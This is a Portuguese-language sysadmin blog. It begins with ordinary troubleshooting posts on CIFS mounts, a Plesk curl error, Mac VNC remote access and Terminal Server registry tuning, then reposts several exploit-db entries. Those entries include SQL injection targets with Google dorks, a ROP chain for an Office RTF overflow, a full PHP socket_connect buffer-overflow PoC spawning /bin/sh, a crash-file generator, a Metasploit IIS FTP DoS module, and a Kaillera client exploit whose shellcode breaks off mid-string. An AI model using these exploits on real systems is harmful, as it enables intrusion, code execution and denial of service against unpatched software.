mount error(): Host is down

Standard

Hi, if you try mount samba (CIFS) on console:

sudo mount -a

mount: mount error(): Host is down (or similar error)
Dont worry :), enter in FSTAB and fix to version 1:

//IP/sharefolder /mnt/destination cifs username=windowslogin,password=passthislogin,iocharset=utf8,vers=1.0,sec=ntlm  0  0

vers=1.0 has added after error.

Change /etc/fstab (this trick) run:
sudo mount -a
ORRRRR
mount -a (like a root)

Fatal error: Call to undefined function curl_init() no plesk 10.4

Standard

No plesk 10.4, quando atualiza-se o mesmo você simplesmente está quase na mão do capiroto!

Sim, o erro vem de cara -> Fatal error: Call to undefined function curl_init()

O que fazer?

 

1 – vá no php.ini que fica em C:\Program Files (x86)\Parallels\Plesk\Additional\PleskPHP5 e tente editar (primeiro localize) a seguinte extensão:

;extension=php_curl.dll — basta somente tirar o ; e depois reiniciar o iis, deve rodar filé.

2 – se ainda ocorrer erro é necessário jogar dlls na pasta syswow64 (para windows 64bt), para isso copie os arquivos libeay32.dll e ssleay32.dll da pasta C:\Program Files (x86)\Parallels\Plesk\Additional\PleskPHP5 e jogue em C:\Windows\Syswow64, depois reinicie o plesk.

 

Ambos procedimentos necessitam de reiniciar todos os serviços do plesk, feito isso, se rolar já me mande uma caixa de BIS! (do preto…)

Instalação do Windows XP ou server 2003 parando em 34 minutos

Standard

Pode parecer curioso, mas se o seu windows XP ou windows server 2003 estiver parando em 34 minutis (instalando dispositivos) vou lhe dizer o nome do “acusado ou acusados”, DISPOSITIVOS USB!

Coloque um teclado PS2 ao invés de um teclado USB, assim como mouse (desconecte impressoras e os demais usb) e corra para o abraço ;).

A importância dos comentários para um Blogueiro

Standard

Hoje, saindo um pouco dos universo das dicas e dos how-tos venho falar hoje da importância dos leitores comentarem no BLOG… Um comentário as vezes é um agravante para um decisão por exemplo de continuar ou não um BLOG, sempre que recebo um comentário dizendo que deu certo, salvou minha, meu cachorro não morreu por causa do seu artigo… isso me deixa imensamente satisfeito… com o appunix não é diferente… temos vários leitores que fazem questão de comentar, deixar bem claro que a informação encontrada aqui no BLOG fez a diferença… galera isso é um Termômetro para qualquer Blogueiro, o comentário de cada leitor é como uma injeção de ânimo, críticas também são bem vindas… o que faz a excelência de um BLOG são os comentários…. tenho visto um aumento assombroso nos acessos ao appunix, mas não vejo isso em questão dos comentários…. Não custa nada, galera, se ajudou a resolver seu problema ou te ensinou algo insteressante… Tire, sei lá… 30 segundos do seu precioso tempo e poste um comentário… isso é muito importante pra gente.

Não sei se já perceberam, mas appunix.com.br é um projeto feito por mim Douglas @doooooguinha e João Paulo @little_oak , temos muita coisa pra passar a vocês… as vezes deixamos de postar alguma solução que temos em mãos por falta de motivação… como a vida de todo SysAdmin não temo muito tempo… então tiramos do momento em que estamos com nossas esposas @sabrinacpsantos e @katyanne_moura pra deixar as coisas mais fáceis pra vocês…. tenho certeza também que já estamos sendo plagiados, já vimos por aí BLOGS que somente alteram nossos textos e nem se quer dão ao luxo de no dar os créditos…  Isso é Plágio, Incompetência e principalmente egoísmo, amigos… Não tem como fazer seu BLOG crescer postando somente conteúdo dos outros… mesmo que você não queira dar créditos, é necessário!

Não quero nosso BLOG também fique cheio de comentário inúteis, tipo (lol ou o/, isso é legal quando se tem um contexto… somente isso, podem simplismente não comentar que fica melhor) queremos algo para nos deixar a par de como está o conteúdo do BLOG, quem é BLOGUEIRO e acompanha o app sabe, a cada dia vamos postando soluções INÉDITAS… nosso conteúdo é escrito pensando em leitores leigos, a até Sysadmins avançados… de forma que tanto um quanto ourto sintam-se confortáveis em ler nossos textos… tentamos ao máximo não escrever artigos técnicos, acreditamos que isso afasta o leitor da realidade computacional (que na minha humilde opinião só perde em complexidade para MULHERES).

Nosso conteúdo é escrito por quem vivem de perto problemas e encontra soluções, Little_oak por exemplo é um grande Doutor na tangente de Software Livre, Hosting (prestanto serviço para os maiores fornecedores de dedicados), PHP  e agora Mac OS/Hackintosh …. Eu com bem menos experiência, trabalho/vivo/respiro tecnologia a mais ou menos 3 anos, com experiência em gerenciamento de servidores Linux/Windows, evangelizador Mac OS… curto e vivo Software Livre e mundo open Source…. (Apesar de ter programado em .NET… ahhh, finalmente estou liberto, concluindo minha graduação em Redes…)

Se algum de vocês que está lendo esse artigo se sente ofendido, DESCULPEM-ME, não foi essa a intensão, quero apenas deixar claro que escrevemos conteúdo de qualidade, mas que queremos ter um termômetro disso na parte de comentários. Nada melhor que deixar uma posição a quem nos ajudou a resolver algum problema… Obrigado por ajudarem esse BLOG crescer a cada dia.

Forte abraço amigos… 😀

Como conectar no Mac os X Snow leopard | Lion via Remote Desktop

Standard

Bom, galera, nós do 4ppun1x conectamos remotamente neste bsd maravilhoso que é o mac afim de que pudéssemos fazer ajustes remotos em nosso pc. Este how to resume-se em habilitar o suporte VNC do mac juntamente com uma senha de segurança para que nosso mac fique tranquilo e seguro para aceitar conexões de rede sem qualquer stress.
Estamos usando o mac os x Snow Leopard (mas funciona no mac os x lion), assim como uma conexão comum (feita de um router wireless) e usando Windows (ops, ruindows) seven e o cliente vnc TightVNC (mostraremos o link de download), que além de free atende bem pra caramba.
Bora simbora e deixar de balela?

Primeiro devemos adentrar nas preferências do sistema afim de irmos aos menus principais de configurações do mac, acompanhe o print:

Clicando no menu de preferências do mac

Clicando no menu de preferências do mac

Agora iremos clicar no menu de preferências:

menus principais SHARING

menus principais SHARING

Pronto, devemos ir na área de Sharing (ali liberamos apache, acesso remoto, compartilhamento de arquivos e etc):

Marcando acesso remoto

Marcando acesso remoto

Assim que marcamos a opção REMOTE MANAGEMENT o menu do print acima é exibido.

Iremos comentar cada opção marcada:

1 – Observe (modo de observação), marcamos o control para permitir controle por parte do acesso remoto (neste caso nosso pc Window$ 7), A opção de mostrar quando há alguém observando o pc é bom de estar marcada (é, meu amigo, alguém dentro e você sem saber é osso né?),

2 – Generate Reports é bom estar marcado pois gera logs (vai que alguém faz besteira?),

3 – Open and Quit app… Deixa marcado, afinal de contas isto habilita o suporte para o cliente remoto poder executar aplicativos,

4 – Change Settings, bem, em um caso de setup, por que não deixar ativo? Vale a pena sim! Se você precisar de um ajuste aqui ou ali deve ter isto ON.

5 – Delete e replace items é bom, afinal de contas direito de escrever, ler e executar, para acesso remoto é quase um padrão.

6 – Start text… é bom quando se quer trocar idéia com o cliente remoto, deixamos on.

7 – Restart and Shutdown, meu amigo, se alguém precisa aplicar mudanças críticas e positivas em seu Mac Os X, por que não deixar este recurso para o acesso remoto? Se achar inviável que alguém remotamente desligue seu apple, deixe isto desmarcado.

8 – Suporte a cópia de itens é bom ;), deixe on.

Assim que damos ok é solicitada autorização do user afim de que seja validada a mudança, mas para que isto ocorra de verdade devemos clicar na opção COMPUTER SETTINGS para poder deixar a coisa no ponto (é aqui que aplicamos a senha de acesso remoto, afinal de contas deixar um mac com todos os recursos globais e ainda deixar sem senha é tiro de calibre 12 no próprio pé, né?

Aplicando senha e confirmando

Aplicando senha e confirmando

Deixe em vnc viewers a senha (coloque algo usando caracteres especiais para dificultar a vida dos lamers, use #$%&*@./<> com caracteres de senha).

Assim que aplicar você precisará confirmar usando sua senha de usuário do sistema, confirme com sua senha (vide print a seguir):

Confirmar senha no Mac Os X

Confirmar senha no Mac Os X

Pode ser que nós (appunix e você), algum dia, nesta vida de trabalhador braçal, possamos nos perguntar?

Como descubro meu ip nesse danado desse mac?

Relaxa, lembra do esquema de Central das preferências do mac? Então, a gente confirmar o Sharing e volta lá, no menu networking, ou seja: Preferências do Sistema-> Network.

Veja o ícone no MEIO da central de preferências:

Centralizador de Preferências do Mac Os X

Centralizador de Preferências do Mac Os X

Pronto, depois é só clicar em Redes (Network) e meter bala, veja o danado do IP no MEIO da nova tela:

Olha o ipzão aí gente

Olha o ipzão aí gente

 

Pronto, já temos o ip em mãos, no meu caso a terminação é 104. O que devemos fazer?

No Microsoft Windows 7 devemos baixar o cliente VNC Free, para isso acesse o linkÇ

http://www.tightvnc.com/download/1.3.10/tightvnc-1.3.10-setup.exe

Baixe o cliente e em seguida abra-o.

Assim que executar o tightvnc você vai ver a seguinte tela:

cliente VNC

cliente VNC

Assim que confirmar o acesso ele vai mostrar uma tela requisitando senha, igual essa aqui ó:

senha VNC

senha VNC

Confirme com aquela senha que você definiu nas propriedades de acesso remoto de seu macosx e FINISH!

 

Curtiu?

Curtimos também.
Abraços a todos e obrigado pela visita!

Como fazer tunning do Terminal Server na windows server 2003

Standard


Eliminate IE Flickering: Configure this setting to force off-screen composition of Internet Explorer, which eliminates the flickering effect. In HKEY_ CURRENT_USER\Software\Microsoft\Internet Explorer\Main, set the DWORD value for Force Offscreen Composition to 1.

Disable Office 2003 Customer Experience Improvement Program: Configure this setting to prevent Office from prompting the user to participate in this program. To enable, in HKEY_ CURRENT_USER\Software\Microsoft\Office\Common, set the DWORD value for QMEnable to 1.
Disable File Locking: Configure this setting to modify the file locking behavior on the server. This will enhance performance, but it's known to have issues with some database applications. To enable, in HKEY_LOCAL_ MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters, set the DWORD value for UseLockReadUnlock to 1.

Disable NTFS Last-Accessed Time Stamping: Configure this setting to prevent the system from updating the last accessed time stamp on files, which can enhance performance. Some applications require this to be accurate, so test prior to implementing. To enable, in HKEY_LOCAL_ MACHINE\System\CurrentCon trolSet\Control\FileSystem, set the DWORD value for NtfsDisable LastAccessUpdate to 1.
Turn off Lazy Writes: This setting prevents the system from caching write operations before writing them to disk. This can speed operation over the network. Configure the following two keys: In HKEY_LOCAL_MACHINE\ System\CurrentControlSet\Services\ LanmanServer\Parameters, set the DWORD value for IRPStackSize to 15. Also, in HKEY_LOCAL_MACHINE\ System\CurrentControlSet\Services\ LanmanWorkstation\Parameters, set the DWORD value for UtilizeNT Caching to 0.

Improve Windows Kernel Performance: Prevents the system from paging kernel mode drivers and system code to disk, which can decrease performance. To configure: In HKEY_LOCAL_ MACHINE\System\CurrentCon trolSet\Control\Session Manager\ Memory Management, set the DWORD value for DisablePagingExecutive to 1.

Increase the Network Request Buffer: This setting boosts performance by increasing the size of the network request buffer, which determines how much data is stored before it is sent to the client. This setting can also improve LAN Manager file writing performance. Increasing the size of this buffer will consume RAM, so adjust and monitor carefully. To enable, in HKEY_ LOCAL_MACHINE\System\Current ControlSet\Services\LanmanServer\Parameters, increase the DWORD value for SizReqBuf to a value between 1024 and 65535.

Eliminate Session Hangs During Logoff: Terminal Server sessions can sometimes hang when the user attempts to log off. One solution: Modify available network buffers and open connections. Configure the following keys: In HKEY_LOCAL_MACHINE\ System\CurrentControlSet\Services\ LanmanServer\Parameters, set the DWORD value for MaxWorkItems to 8196, MaxMpxCt to 2048, MaxRaw WorkItems to 512, MaxFreeConnections to 100, and MinFreeConnections to 32. In KEY_LOCAL_MACHINE\ System\CurrentControlSet\ Services\LanmanServer\Parameters, set the DWORD value for MaxCmds to 2048. Also, in HKEY_LOCAL_ MACHINE\System\Current ControlSet\Control\SessionManager\ ConfigurationManager, set the value for RegistryLazyFlushInterval to 60. Lastly, ensure that the Enable Advanced Performance feature is enabled when viewing device properties of all disk drives on the system.

Speed up Application Load Times: Increase the perceived performance of your Terminal Server by pre-loading commonly used files into memory. This works well on systems with plenty of available RAM. To enable, in HKEY_ LOCAL_MACHINE\System\ CurrentControlSet\Control\Session Manager\Memory Management\ PrefetchParameters, set the DWORD value for EnablePrefetcher to 3.

Disable Caching of Roaming Profiles: Excess roaming profiles on a Terminal Server can consume disk and Registry quota space. Configuring this setting can eliminate waste but increase user's login time. To enable, in HKEY_ LOCAL_MACHINE\Software\ Microsoft\Windows NT\Current Version\Winlogon, set the DWORD value for DeleteRoamingCache to 1.

Disable Unused Subsystems: Not using the POSIX subsystem on your Terminal Server? Disable it and navigate to the registry location HKEY_LOCAL_ MACHINE\System\CurrentCon trolSet\Control\Session Manager\ Subsystems and delete the Posix key. Disable the File Indexing Service: File Indexing Service is great for quickly searching for files, but your Terminal Server arguably shouldn't have that many user files on it and the indexing process can consume huge system resources. To disable it, navigate to the properties menu of each drive on your system and deselect the box for Allow Indexing Service to index this disk for fast file searching.

O registro do windows deve assemelhar-se com:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\
Main]
"Force Offscreen Composition"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\Common]
"QMEnable"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
LanmanWorkstation\Parameters]
"UseLockReadUnlock"=dword:00000001

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\
FileSystem]
"NtfsDisableLastAccessUpdate"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
Lanman Server\Parameters]
"IRPStackSize"=dword:0000000f
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Service\
Lanman WorkStation\Parameters]
"UtilizeNTCaching"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Session Manager\Memory Management]
"DisablePagingExecutive"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
LanmanServer\Parameters]
"SizReqBuf"=dword:0000ffff

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
Lanmanserver\Parameters]
"MaxWorkItems"=dword:00002004
"MaxMpxCt"=dword:00000800
"MaxRawWorkItems"=dword:00000200
"MaxFreeConnections"=dword:00000064
"MinFreeConnections"=dword:00000020
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
Lanmanworkstation\Parameters]
"MaxCmds"=dword:00000800
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\
Session Manager\Configuration Manager]
"RegistryLazyFlushInterval"=dword:0000003c

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
SessionManager\Memory Management\PrefetchParameters]
"EnablePrefetcher"="3"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Winlogon]
"DeleteRoamingCache"=dword:00000001

http://redmondmag.com/articles/2006/06/01/speed-up-terminal-server.aspx

DmxReady Bilboard v1.2 SQL Injection Vulnerability

Standard

# Exploit Title: DmxReady Bilboard v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_billboardmanager_summary_popup.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=billboard-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members....
----------------------------------------------------------------------------------------------------
Bug;

http://target/path/admin/BillboardManager/update.asp?ItemID=xx [ SQL ATTACK]

Fonte: http://www.exploit-db.com/exploits/17481/

DmxReady Document Library Manager v1.2 SQL Injection Vulnerability

Standard

# Exploit Title: DmxReady Document Library Manager v1.2 SQL Injection
Vulnerability
# Google Dork: inurl:inc_documentlibrarymanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=document-library-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members....

----------------------------------------------------------------------------------------------------
Bug;

http://target/path/admin/DocumentLibraryManager/update.asp?ItemID=xx [ SQL ATTACK]

Fonte: http://www.exploit-db.com/exploits/17482/

DMXReady Account List Manager v1.2 SQL Injection Vulnerability

Standard

# Exploit Title: DMXReady Account List Manager v1.2 SQL Injection
Vulnerability
# Google Dork: inurl:inc_billboardmanager_summary_popup.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=account-list-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
#Demo :
http://demo.dmxready.com/applications/AccountListManager/inc_accountlistmanager.asp
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members....
---------------------------------------------------------------------------------------------------
Bug;

http://target/path/admin/AccountListManager/update.asp?AccountID=xx [ SQL ATTACK]

Fonte: http://www.exploit-db.com/exploits/17483/

DmxReady Links Manager v1.2 SQL Injection Vulnerability

Standard

# Exploit Title: DmxReady Links Manager v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_linksmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=links-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….
————————————————————————————————————
Bug;

http://target/path/admin/LinksManager/update.asp?ItemID=xx [ SQL ATTACK]

Fonte: http://www.exploit-db.com/exploits/17484/

MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit

Standard

# Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability
Exploit
# Date: 7/3/2011
# Author: Snake ( Shahriyar.j < at > gmail )
# Version: MS Office <= 2010
# Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7
# CVE : CVE-2010-3333

# This is the exploit I wrote for Abysssec "The Arashi" article.
# It gracefully bypass DEP/ASLR in MS Office 2010,
# and we named this method "Ikazuchi DEP/ASRL Bypass" : >
# unfortunately msgr3en.dll loads a few seconds after opining office,
# so just need to open open Office , and then open exploit after a few
second and saw a nice calc.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
http://www.exploit-db.com/download_pdf/17469

# me : twitter.com/ponez
# aslo check here for Persian docs of this methods and more :
http://www.0days.ir/article/

Exploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc

#
# and the Rop :

3F2CB9E0 POP ECX
RETN
# HeapCreate() IAT = 3F10115C

3F389CA5 MOV EAX,DWORD PTR DS:[ECX]
RETN
# EAX == HeapCreate() Address

3F39AFCF CALL EAX
RETN
# Call HeapCreate() and Create a Executable Heap :D
# after this call, EAX contain our Heap Address.

0x3F2CB9E0 POP ECX
RETN
# pop 0x00008000 into ECX

0x3F39CB46 ADD EAX,ECX
POP ESI
RETN
# add ECX to EAX and instead of calling HeapAlloc,
# now EAX point to the RWX Heap :D

0x3F2CB9E0 POP ECX
RETN
# pop 0x3F3B3DC0 into ECX, it is a writable address.

0x3F2233CC MOV DWORD PTR DS:[ECX],EAX
RETN
# storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for
further use ;)

0x3F2D59DF POP EAX
ADD DWORD PTR DS:[EAX],ESP
RETN
# pop 0x3F3B3DC4 into EAX , it is writable address with zero!
# then we add ESP to the Zero which result in storing ESP into
that address,
# we need ESP address for copying shellcode ( which stores in
Stack ),
# and we have to get it dynamically at run-time, now with my
tricky instruction, we have it!

0x3F2F18CC POP EAX
RETN
# pop 0x3F3B3DC4 ( ESP address ) into EAX

0x3F2B745E MOV ECX,DWORD PTR DS:[EAX]
RETN
# now ECX point to nearly offset of Stack.

0x3F39795E POP EDX
RETN
# pop 0x00000024 into EDX

0x3F39CB44 ADD ECX,EDX
ADD EAX,ECX
POP ESI
RETN
# add 0x24 to ECX ( Stack address )

0x3F398267 MOV EAX,ECX
RETN
# EAX = ECX ; )

0x3F3A16DE MOV DWORD PTR DS:[ECX],EAX
XOR EAX,EAX
POP ESI
RETN
# mov EAX ( Stack Address + 24 = Current ESP value ) into the
current Stack Location,
# and the popping it into ESI ! now ESI point where shellcode
stores in stack :D

0x3F398267 MOV EAX,ECX
RETN
# EAX = ECX ; )

3F2CB9E0 POP ECX
RETN
# pop 0x3F3B3DC0 ( Saved Heap address ) into ECX

0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]
RETN
# now EAX point to our RWX Heap

0x3F2B0A7C XCHG EAX,EDI
RETN 4
# EDI = Our RWX Heap Address

3F2CB9E0 POP ECX
RETN
# pop 0x3F3B3DC0 ( Saved Heap address ) into ECX

0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]
RETN
# now EAX point to our RWX Heap

0x3F38BEFB ADD AL,58
RETN
# just skip some junks ; )

3F2CB9E0 POP ECX
RETN
# pop 0x00000080 into ECX ( 0x80 * 4 = 0x200 = Copy lent )

3F3441B4 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
POP EDI
POP ESI
RETN
# Copy shellcode from stack into RWX Heap

3F39AFCF CALL EAX
RETN
# KABOOM !!!

Exploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc

Fonte: http://www.exploit-db.com/exploits/17474/

PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938

Standard

/*
** Jonathan Salwan - @shell_storm
** http://shell-storm.org
** 2011-06-04
**
** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938
**
** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c
** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary
** code via a long pathname for a UNIX socket.
*/

echo "[+] PHP 5.3.6 Buffer Overflow PoC (ROP)n";
echo "[+] CVE-2011-1938nn";

# Gadgets in /usr/bin/php
define('DUMMY', "x42x42x42x42"); // padding
define('STACK', "x20xbax74x08"); // .data 0x46a0 0x874ba20
define('STACK4', "x24xbax74x08"); // STACK + 4
define('STACK8', "x28xbax74x08"); // STACK + 8
define('STACK12', "x3cxbax74x08"); // STACK + 12
define('INT_80', "x27xb6x07x08"); // 0x0807b627: int $0x80
define('INC_EAX', "x66x50x0fx08"); // 0x080f5066: inc %eax | ret
define('XOR_EAX', "x60xb4x09x08"); // 0x0809b460: xor %eax,%eax | ret
define('MOV_A_D', "x84x3ex12x08"); // 0x08123e84: mov %eax,(%edx) | ret
define('POP_EBP', "xc7x48x06x08"); // 0x080648c7: pop %ebp | ret
define('MOV_B_A', "x18x45x06x08"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('MOV_DI_DX', "x20x26x07x08"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret
define('POP_EDI', "x23x26x07x08"); // 0x08072623: pop %edi | pop %ebp | ret
define('POP_EBX', "x0fx4dx21x08"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('XOR_ECX', "xe3x3bx1fx08"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret

$padd = str_repeat("A", 196);

$payload = POP_EDI. // pop %edi
STACK. // 0x874ba20
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"//bi". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK4. // 0x874ba24
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"n/sh". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK8. // 0x874ba28
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
MOV_A_D. // mov %eax,(%edx)
XOR_ECX. // xor %ecx,%ecx
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
POP_EBX. // pop %ebx
STACK. // 0x874ba20
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INT_80; // int $0x80

$evil = $padd.$payload;

$fd = socket_create(AF_UNIX, SOCK_STREAM, 1);
$ret = socket_connect($fd, $evil);
?>

Fonte: http://www.exploit-db.com/exploits/17486/

Donar Player 2.8.0 Denial of Service Vulnerability

Standard

# ########################################
# Title : Donar Player 2.8.0 Denial of Service
# Software link : http://www.donarzone.com/downloads/donar-player-setup-free.exe , http://www.donarzone.com/donar-player
# Version : 2.8.0
# Tested on : Windows XP SP3 English
# Date : 3/07/2011
# Author : X-h4ck
# Website : http://www.pirate.al , # PirateAL Crew @2011 , http://theflashcrew.blogspot.com
# Email : mem001@live.com
# Greetz : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta
# ########################################

#!/usr/bin/python

filename = "crash.wma"

junk = "x41" * 1337

FILE = open(filename, "w")
FILE.write(junk)
FILE.close()
print " Open", filename, "on Donar Player and play it.. (the application will Crash)"
print " PirateAL Crew"

Fonte: http://www.exploit-db.com/exploits/17471/

Microsoft IIS FTP Server

Standard

# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS
# Date: Jul 03, 2011
# Author: Myo Soe
# Software Link: http://www.microsoft.com/
# Version: 5.0 - 7.0
# Tested on: unpatched version of windows xp & 2k3

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos

def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion Denial of Service',
'Description' => %q{
This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. This exploit is especially meant for the service which is configured as "manual" mode in startup type.
},
'Author' => [
'Nikolaos "Kingcope" Rangos', # Bug Discoverer
'Myo Soe ' # Metasploit Module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1.0 $',
'References' =>
[
[ 'CVE', '2009-2521'],
[ 'BID', '36273'],
[ 'OSVDB', '57753'],
[ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']

],
'DisclosureDate' => 'Sep 03 2009'))

register_options([
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'mozilla@example.com' ])
])
end

def run

return unless connect_login

print_status("Sending DoS packets ...")

send_cmd_data(['ls','-R */../'],nil)

disconnect

print_good("Done")

end
end

Fonte: http://www.exploit-db.com/exploits/17476/

Kaillera Multiple Clients Buffer Overflow Vulnerabilities

Standard

#!/usr/bin/perl

# Exploit Title: Remote Buffer Overflows in Kaillera clients
# Date: 6/30/11
# Author: sil3nt_dre4m
# Software Link: Multiple:
# 1.  Kaillera original client: An emulator to download with this client bundled with it is Project64K 0.13: http://www.zophar.net/download_file/1907
# 2.  Supraclient 0.85.2 CPPE : This client can be found here: http://morphus56k.110mb.com/website/downloads/SupraclientCPPE_v0.85.2.zip
# 3.  Open Kaillera p2p client: http://sourceforge.net/projects/okai/files/Client/n02.p2p%20v0/n02.P2P.v0r6.client.v0.5r0.zip/download
# Version: Multiple-see below
# Tested on: Windows XP, Windows 7
#Introduction:
#This script acts as a Kaillera server in order to exploit various Kaillera clients.
#Kaillera facilitates playing emulator games over a network.
#The Kaillera protocol is built on top of UDP and is mostly documented here: http://www.emulinker.com/index.php?page=Documentation&help=true
#Kaillera clients implement this protocol, and many of them have serious vulnerabilities in their code.
#This server is capable of exploiting buffer overflows in the following clients:
#Exploit tested against Windows 7 and XP machines, gets around ASLR (modules don't have it loaded).
#Note: If you wish to exploit the same client twice, you will need to restart the server.
#To reproduce the bugs shown here:
#1.  Download the Kaillera client you wish to test bug on.
#2.  Download emulator capable of Kaillera netplay, or one which this script targets (Mame32k, and so forth).
#3.  Overwrite existing kailleraclient.dll with the one you wish to exploit (Supraclient, open kaillera, original client).
#4.  Look for something that says netplay or Kaillera, and select it.  In each emulator its different, for instance in Project64K go to File > Start Netplay.
#5.  Run this server and connect to the IP its hosted on with the kaillera client.
#Greetz to: Blindgeek and jediknight304 for much help with this script, corelanc0d3r for
#awesome tutorials on buffer overflows, and Requiem for help with fixing security bugs in Kaillera clients.
#DISCLAIMER: I'm not responsible for how you use this code.
#By running this code, you agree to accept responsibility for how you use it and you agree to not hold me responsible for any problems arising from running this code.
#Final Note: For more information on Kaillera vulnerabilities and remediation information, check out http://kaillerahacks.blogspot.com/.
use strict;
use warnings;
use IO::Socket;
use Getopt::Long;
use Digest::MD5 qw(md5);
use subs qw(sendmessage help);
### Shellcode- spawn calc.exe from Metasploit Framework - ###
my $sc =
"x31xc9xddxc5xb8xe6xd8x80xa4xb1x33xd9x74x24" .
"xf4x5ax31x42x16x83xeaxfcx03x42xf4x3ax75x58" .
"x10x33x76xa1xe0x24xfex44xd1x76x64x0cx43x47" .
"xeex40x6fx2cxa2x70xe4x40x6bx76x4dxeex4dxb9" .
"x4exdex51x15x8cx40x2ex64xc0xa2x0fxa7x15xa2" .
"x48xdaxd5xf6x01x90x47xe7x26xe4x5bx06xe9x62" .
"xe3x70x8cxb5x97xcax8fxe5x07x40xc7x1dx2cx0e" .
"xf8x1cxe1x4cxc4x57x8exa7xbex69x46xf6x3fx58" .
"xa6x55x7ex54x2bxa7x46x53xd3xd2xbcxa7x6exe5" .
"x06xd5xb4x60x9bx7dx3fxd2x7fx7fxecx85xf4x73" .
